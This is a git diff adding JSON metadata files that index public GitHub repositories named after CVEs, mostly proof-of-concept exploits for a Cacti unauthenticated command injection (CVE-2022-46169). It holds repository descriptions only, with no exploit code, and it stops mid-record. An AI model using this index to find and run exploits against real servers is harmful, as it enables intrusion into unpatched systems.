"CVE-2022-46104---POC", + "full_name": "NurSec747\/CVE-2022-46104---POC", + "owner": { + "login": "NurSec747", + "id": 123009127, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123009127?v=4", + "html_url": "https:\/\/github.com\/NurSec747", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NurSec747\/CVE-2022-46104---POC", + "description": null, + "fork": false, + "created_at": "2023-01-18T17:41:06Z", + "updated_at": "2023-01-18T17:41:06Z", + "pushed_at": "2023-01-18T17:51:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4611.json b/2022/CVE-2022-4611.json new file mode 100644 index 0000000000..e2ce388bb2 --- /dev/null +++ b/2022/CVE-2022-4611.json @@ -0,0 +1,64 @@ +[ + { + "id": 663142991, + "name": "CVE-2022-4611", + "full_name": "Phamchie\/CVE-2022-4611", + "owner": { + "login": "Phamchie", + "id": 97181079, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97181079?v=4", + "html_url": "https:\/\/github.com\/Phamchie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Phamchie\/CVE-2022-4611", + "description": null, + "fork": false, + "created_at": "2023-07-06T16:40:08Z", + "updated_at": "2023-08-05T15:42:03Z", + "pushed_at": "2023-07-06T16:50:24Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 663236213, + "name": "CVE-2022-4611", + "full_name": "fgsoftware1\/CVE-2022-4611", + "owner": { + "login": "fgsoftware1", + "id": 60277618, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60277618?v=4", + "html_url": "https:\/\/github.com\/fgsoftware1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fgsoftware1\/CVE-2022-4611", + "description": null, + "fork": false, + "created_at": "2023-07-06T21:28:29Z", + "updated_at": "2023-07-06T21:31:15Z", + "pushed_at": "2023-07-06T21:31:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4616.json b/2022/CVE-2022-4616.json new file mode 100644 index 0000000000..5de2e56bbe --- /dev/null +++ b/2022/CVE-2022-4616.json @@ -0,0 +1,33 @@ +[ + { + "id": 639674200, + "name": "CVE-2022-4616-POC", + "full_name": "ahanel13\/CVE-2022-4616-POC", + "owner": { + "login": "ahanel13", + "id": 47185077, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47185077?v=4", + "html_url": "https:\/\/github.com\/ahanel13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ahanel13\/CVE-2022-4616-POC", + "description": "This Python script aids in exploiting CVE-2022-46169 by automating payload delivery and response handling. It starts an HTTP server, listens for requests, and enables command input for real-time interaction with a vulnerable target.", + "fork": false, + "created_at": "2023-05-12T01:20:15Z", + "updated_at": "2023-05-24T22:36:05Z", + "pushed_at": "2023-05-24T22:36:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46164.json b/2022/CVE-2022-46164.json new file mode 100644 index 0000000000..06191001d1 --- /dev/null +++ b/2022/CVE-2022-46164.json @@ -0,0 +1,33 @@ +[ + { + "id": 585004232, + "name": "CVE-2022-46164-poc", + "full_name": "stephenbradshaw\/CVE-2022-46164-poc", + "owner": { + "login": "stephenbradshaw", + "id": 7692557, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7692557?v=4", + "html_url": "https:\/\/github.com\/stephenbradshaw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stephenbradshaw\/CVE-2022-46164-poc", + "description": "Basic POC exploit for CVE-2022-46164", + "fork": false, + "created_at": "2023-01-04T04:17:30Z", + "updated_at": "2023-09-08T08:19:32Z", + "pushed_at": "2023-01-11T07:16:34Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46166.json b/2022/CVE-2022-46166.json new file mode 100644 index 0000000000..bdf39cc9f0 --- /dev/null +++ b/2022/CVE-2022-46166.json @@ -0,0 +1,33 @@ +[ + { + "id": 599959676, + "name": "CVE-2022-46166", + "full_name": "DickDock\/CVE-2022-46166", + "owner": { + "login": "DickDock", + "id": 45897719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45897719?v=4", + "html_url": "https:\/\/github.com\/DickDock", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DickDock\/CVE-2022-46166", + "description": "CVE-2022-46166 靶场环境", + "fork": false, + "created_at": "2023-02-10T09:06:34Z", + "updated_at": "2023-11-14T16:13:35Z", + "pushed_at": "2023-02-10T09:15:44Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-46169.json b/2022/CVE-2022-46169.json new file mode 100644 index 0000000000..68c2c303cb --- /dev/null +++ b/2022/CVE-2022-46169.json @@ -0,0 +1,1072 @@ +[ + { + "id": 575289853, + "name": "CVE-2022-46169", + "full_name": "imjdl\/CVE-2022-46169", + "owner": { + "login": "imjdl", + "id": 31382943, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31382943?v=4", + "html_url": "https:\/\/github.com\/imjdl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/imjdl\/CVE-2022-46169", + "description": "CVE-2022-46169", + "fork": false, + "created_at": "2022-12-07T07:11:23Z", + "updated_at": "2023-03-28T06:17:46Z", + "pushed_at": "2022-12-07T07:17:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 575651169, + "name": "CVE-2022-46169", + "full_name": "0xf4n9x\/CVE-2022-46169", + "owner": { + "login": "0xf4n9x", + "id": 40891670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40891670?v=4", + "html_url": "https:\/\/github.com\/0xf4n9x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xf4n9x\/CVE-2022-46169", + "description": "CVE-2022-46169 Cacti remote_agent.php Unauthenticated Command Injection.", + "fork": false, + "created_at": "2022-12-08T01:52:13Z", + "updated_at": "2024-10-30T03:43:51Z", + "pushed_at": "2022-12-08T02:50:46Z", + "stargazers_count": 49, + "watchers_count": 49, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 49, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 579086902, + "name": "CVE-2022-46169", + "full_name": "taythebot\/CVE-2022-46169", + "owner": { + "login": "taythebot", + "id": 60461479, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60461479?v=4", + "html_url": "https:\/\/github.com\/taythebot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/taythebot\/CVE-2022-46169", + "description": "CVE-2022-46169 - Cacti Blind Remote Code Execution (Pre-Auth)", + "fork": false, + "created_at": "2022-12-16T16:16:35Z", + "updated_at": "2023-01-05T21:32:10Z", + "pushed_at": "2022-12-16T16:53:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 584490516, + "name": "CVE-2022-46169", + "full_name": "Inplex-sys\/CVE-2022-46169", + "owner": { + "login": "Inplex-sys", + "id": 69421356, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69421356?v=4", + "html_url": "https:\/\/github.com\/Inplex-sys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Inplex-sys\/CVE-2022-46169", + "description": "Cacti Unauthenticated Command Injection", + "fork": false, + "created_at": "2023-01-02T18:03:26Z", + "updated_at": "2023-03-11T00:41:32Z", + "pushed_at": "2023-01-02T18:05:45Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cacti", + "cve", + "hgrab-framework", + "poc", + "rce", + "scanner", + "vulnerability" + ], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 585629170, + "name": "CVE-2022-46169", + "full_name": "sAsPeCt488\/CVE-2022-46169", + "owner": { + "login": "sAsPeCt488", + "id": 55363474, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55363474?v=4", + "html_url": "https:\/\/github.com\/sAsPeCt488", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sAsPeCt488\/CVE-2022-46169", + "description": "PoC for CVE-2022-46169 - Unauthenticated RCE on Cacti <= 1.2.22", + "fork": false, + "created_at": "2023-01-05T16:56:06Z", + "updated_at": "2025-01-03T17:25:08Z", + "pushed_at": "2023-05-05T18:06:58Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cacti", + "cve-2022-46169", + "poc" + ], + "visibility": "public", + "forks": 8, + "watchers": 29, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 588437634, + "name": "CVE-2022-46169", + "full_name": "c3rrberu5\/CVE-2022-46169", + "owner": { + "login": "c3rrberu5", + "id": 109983457, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/109983457?v=4", + "html_url": "https:\/\/github.com\/c3rrberu5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c3rrberu5\/CVE-2022-46169", + "description": "Exploit to CVE-2022-46169 vulnerability", + "fork": false, + "created_at": "2023-01-13T05:37:56Z", + "updated_at": "2024-06-06T21:53:35Z", + "pushed_at": "2023-01-16T23:14:04Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 589360535, + "name": "CVE-2022-46169", + "full_name": "Habib0x0\/CVE-2022-46169", + "owner": { + "login": "Habib0x0", + "id": 24976957, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24976957?v=4", + "html_url": "https:\/\/github.com\/Habib0x0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Habib0x0\/CVE-2022-46169", + "description": "Cacti: Unauthenticated Remote Code Execution Exploit in Ruby ", + "fork": false, + "created_at": "2023-01-15T22:46:52Z", + "updated_at": "2023-02-13T09:30:29Z", + "pushed_at": "2023-01-20T07:10:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 589524043, + "name": "CVE-2022-46169_POC", + "full_name": "N1arut\/CVE-2022-46169_POC", + "owner": { + "login": "N1arut", + "id": 41994914, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41994914?v=4", + "html_url": "https:\/\/github.com\/N1arut", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/N1arut\/CVE-2022-46169_POC", + "description": "RCE POC for CVE-2022-46169", + "fork": false, + "created_at": "2023-01-16T10:21:26Z", + "updated_at": "2023-10-08T20:21:44Z", + "pushed_at": "2023-01-17T16:32:46Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 596690527, + "name": "CVE-2022-46169", + "full_name": "miko550\/CVE-2022-46169", + "owner": { + "login": "miko550", + "id": 83682793, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83682793?v=4", + "html_url": "https:\/\/github.com\/miko550", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/miko550\/CVE-2022-46169", + "description": null, + "fork": false, + "created_at": "2023-02-02T18:21:08Z", + "updated_at": "2023-02-02T18:25:02Z", + "pushed_at": "2023-02-02T18:42:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 612724556, + "name": "cacti-cve-2022-46169-exploit", + "full_name": "ariyaadinatha\/cacti-cve-2022-46169-exploit", + "owner": { + "login": "ariyaadinatha", + "id": 54601298, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54601298?v=4", + "html_url": "https:\/\/github.com\/ariyaadinatha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ariyaadinatha\/cacti-cve-2022-46169-exploit", + "description": "This is poc of CVE-2022-46169 authentication bypass and remote code execution", + "fork": false, + "created_at": "2023-03-11T19:39:44Z", + "updated_at": "2023-11-22T00:03:33Z", + "pushed_at": "2023-05-18T19:06:36Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 16, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 616701865, + "name": "CVE-2022-46169", + "full_name": "doosec101\/CVE-2022-46169", + "owner": { + "login": "doosec101", + "id": 128431701, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128431701?v=4", + "html_url": "https:\/\/github.com\/doosec101", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/doosec101\/CVE-2022-46169", + "description": "Repo for CVE-2022-46169", + "fork": false, + "created_at": "2023-03-20T22:54:18Z", + "updated_at": "2023-03-20T23:57:27Z", + "pushed_at": "2023-03-21T04:56:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 622325901, + "name": "cacti-rce-cve-2022-46169-vulnerable-application", + "full_name": "m3ssap0\/cacti-rce-cve-2022-46169-vulnerable-application", + "owner": { + "login": "m3ssap0", + "id": 705120, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/705120?v=4", + "html_url": "https:\/\/github.com\/m3ssap0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m3ssap0\/cacti-rce-cve-2022-46169-vulnerable-application", + "description": "WARNING: This is a vulnerable application to test the exploit for the Cacti command injection (CVE-2022-46169). Run it at your own risk!", + "fork": false, + "created_at": "2023-04-01T19:20:29Z", + "updated_at": "2023-09-22T17:23:40Z", + "pushed_at": "2023-04-03T11:01:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cacti", + "command-injection", + "cve-2022-46169", + "rce", + "vulnerable-application" + ], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 622368239, + "name": "CVE-2022-46169_poc", + "full_name": "devAL3X\/CVE-2022-46169_poc", + "owner": { + "login": "devAL3X", + "id": 40294005, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40294005?v=4", + "html_url": "https:\/\/github.com\/devAL3X", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devAL3X\/CVE-2022-46169_poc", + "description": null, + "fork": false, + "created_at": "2023-04-01T22:37:37Z", + "updated_at": "2023-04-01T22:37:46Z", + "pushed_at": "2023-04-13T15:18:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 625050292, + "name": "CVE-2022-46169_unauth_remote_code_execution", + "full_name": "JacobEbben\/CVE-2022-46169_unauth_remote_code_execution", + "owner": { + "login": "JacobEbben", + "id": 112503338, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112503338?v=4", + "html_url": "https:\/\/github.com\/JacobEbben", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JacobEbben\/CVE-2022-46169_unauth_remote_code_execution", + "description": "Unauthenticated Remote Code Execution through authentication bypass and command injection in Cacti < 1.2.23 and < 1.3.0", + "fork": false, + "created_at": "2023-04-07T23:40:53Z", + "updated_at": "2023-05-13T16:45:25Z", + "pushed_at": "2023-04-09T11:02:59Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 627335815, + "name": "CVE-2022-46169", + "full_name": "icebreack\/CVE-2022-46169", + "owner": { + "login": "icebreack", + "id": 6855402, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6855402?v=4", + "html_url": "https:\/\/github.com\/icebreack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/icebreack\/CVE-2022-46169", + "description": "Fixed exploit for CVE-2022-46169 (originally from https:\/\/www.exploit-db.com\/exploits\/51166)", + "fork": false, + "created_at": "2023-04-13T08:55:08Z", + "updated_at": "2023-04-14T17:26:04Z", + "pushed_at": "2023-04-13T08:55:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 634367688, + "name": "CVE-2022-46169", + "full_name": "devilgothies\/CVE-2022-46169", + "owner": { + "login": "devilgothies", + "id": 104858033, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104858033?v=4", + "html_url": "https:\/\/github.com\/devilgothies", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devilgothies\/CVE-2022-46169", + "description": "PoC for CVE-2022-46169 that affects Cacti 1.2.22 version", + "fork": false, + "created_at": "2023-04-29T22:14:17Z", + "updated_at": "2023-04-29T22:28:21Z", + "pushed_at": "2023-04-29T22:25:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cacti", + "cve-2022-46169", + "poc", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 634502064, + "name": "CVE-2022-46169", + "full_name": "yassinebk\/CVE-2022-46169", + "owner": { + "login": "yassinebk", + "id": 62627838, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62627838?v=4", + "html_url": "https:\/\/github.com\/yassinebk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yassinebk\/CVE-2022-46169", + "description": "CVE-2022-46169", + "fork": false, + "created_at": "2023-04-30T10:37:44Z", + "updated_at": "2023-04-30T10:37:52Z", + "pushed_at": "2023-04-30T10:37:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 634912432, + "name": "CVE-2022-46169", + "full_name": "ruycr4ft\/CVE-2022-46169", + "owner": { + "login": "ruycr4ft", + "id": 103446004, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103446004?v=4", + "html_url": "https:\/\/github.com\/ruycr4ft", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ruycr4ft\/CVE-2022-46169", + "description": "Exploit for cacti version 1.2.22", + "fork": false, + "created_at": "2023-05-01T14:29:28Z", + "updated_at": "2023-10-11T14:48:00Z", + "pushed_at": "2023-10-11T14:48:53Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 635027757, + "name": "CVE-2022-46169-CACTI-1.2.22", + "full_name": "FredBrave\/CVE-2022-46169-CACTI-1.2.22", + "owner": { + "login": "FredBrave", + "id": 114189847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114189847?v=4", + "html_url": "https:\/\/github.com\/FredBrave", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FredBrave\/CVE-2022-46169-CACTI-1.2.22", + "description": "This is a exploit of CVE-2022-46169 to cacti 1.2.22. This exploit allows through an RCE to obtain a reverse shell on your computer.", + "fork": false, + "created_at": "2023-05-01T20:00:23Z", + "updated_at": "2025-01-02T07:46:28Z", + "pushed_at": "2023-09-11T17:56:27Z", + "stargazers_count": 40, + "watchers_count": 40, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 40, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 635123796, + "name": "RCE-Cacti-1.2.22", + "full_name": "sha-16\/RCE-Cacti-1.2.22", + "owner": { + "login": "sha-16", + "id": 89037170, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89037170?v=4", + "html_url": "https:\/\/github.com\/sha-16", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sha-16\/RCE-Cacti-1.2.22", + "description": "Este es un código del exploit CVE-2022-46169, que recree utilizando Python3! Si por ahí estás haciendo una máquina de HTB, esto te puede ser útil... 🤞✨ ", + "fork": false, + "created_at": "2023-05-02T02:41:44Z", + "updated_at": "2024-10-31T16:23:19Z", + "pushed_at": "2023-05-02T03:36:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 635433764, + "name": "CVE-2022-46169", + "full_name": "Safarchand\/CVE-2022-46169", + "owner": { + "login": "Safarchand", + "id": 38681779, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38681779?v=4", + "html_url": "https:\/\/github.com\/Safarchand", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Safarchand\/CVE-2022-46169", + "description": "Improved PoC for Unauthenticated RCE on Cacti <= 1.2.22 - CVE-2022-46169", + "fork": false, + "created_at": "2023-05-02T17:26:11Z", + "updated_at": "2023-05-04T17:07:23Z", + "pushed_at": "2023-05-02T17:50:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cacti-rce", + "cve-2022-46169", + "poc", + "rce" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 635946571, + "name": "CVE-2022-46169", + "full_name": "MarkStrendin\/CVE-2022-46169", + "owner": { + "login": "MarkStrendin", + "id": 638560, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/638560?v=4", + "html_url": "https:\/\/github.com\/MarkStrendin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MarkStrendin\/CVE-2022-46169", + "description": "Proof of concept \/ CTF script for exploiting CVE-2022-46169 in Cacti, versions >=1.2.22", + "fork": false, + "created_at": "2023-05-03T19:53:01Z", + "updated_at": "2023-05-03T19:54:22Z", + "pushed_at": "2023-05-03T19:56:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 636441307, + "name": "CVE-2022-46169", + "full_name": "BKreisel\/CVE-2022-46169", + "owner": { + "login": "BKreisel", + "id": 1513073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1513073?v=4", + "html_url": "https:\/\/github.com\/BKreisel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BKreisel\/CVE-2022-46169", + "description": "🐍 Python Exploit for CVE-2022-46169", + "fork": false, + "created_at": "2023-05-04T21:21:05Z", + "updated_at": "2023-05-04T22:04:32Z", + "pushed_at": "2023-05-04T22:03:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-46169", + "exploit", + "python" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 640014872, + "name": "EH2-PoC", + "full_name": "Rickster5555\/EH2-PoC", + "owner": { + "login": "Rickster5555", + "id": 92229061, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92229061?v=4", + "html_url": "https:\/\/github.com\/Rickster5555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rickster5555\/EH2-PoC", + "description": "A simple PoC for CVE-2022-46169 a.k.a Cacti Unauthenticated Command Injection, a vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti prior from version 1.2.17 to 1.2.22", + "fork": false, + "created_at": "2023-05-12T19:08:45Z", + "updated_at": "2023-05-12T19:29:22Z", + "pushed_at": "2023-05-15T02:36:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 643437445, + "name": "CVE-2022-46169", + "full_name": "antisecc\/CVE-2022-46169", + "owner": { + "login": "antisecc", + "id": 92209707, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92209707?v=4", + "html_url": "https:\/\/github.com\/antisecc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/antisecc\/CVE-2022-46169", + "description": null, + "fork": false, + "created_at": "2023-05-21T06:43:17Z", + "updated_at": "2023-05-21T06:44:18Z", + "pushed_at": "2023-05-21T06:48:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 673282845, + "name": "CVE-2022-46169", + "full_name": "dawnl3ss\/CVE-2022-46169", + "owner": { + "login": "dawnl3ss", + "id": 52249849, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52249849?v=4", + "html_url": "https:\/\/github.com\/dawnl3ss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dawnl3ss\/CVE-2022-46169", + "description": "Unauthenticated Command Injection in Cacti <= 1.2.22", + "fork": false, + "created_at": "2023-08-01T09:29:30Z", + "updated_at": "2023-08-01T09:30:11Z", + "pushed_at": "2023-08-01T09:31:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 685095951, + "name": "CVE-2022-46169", + "full_name": "a1665454764\/CVE-2022-46169", + "owner": { + "login": "a1665454764", + "id": 143511005, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/143511005?v=4", + "html_url": "https:\/\/github.com\/a1665454764", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/a1665454764\/CVE-2022-46169", + "description": "CVE-2022-46169", + "fork": false, + "created_at": "2023-08-30T14:03:41Z", + "updated_at": 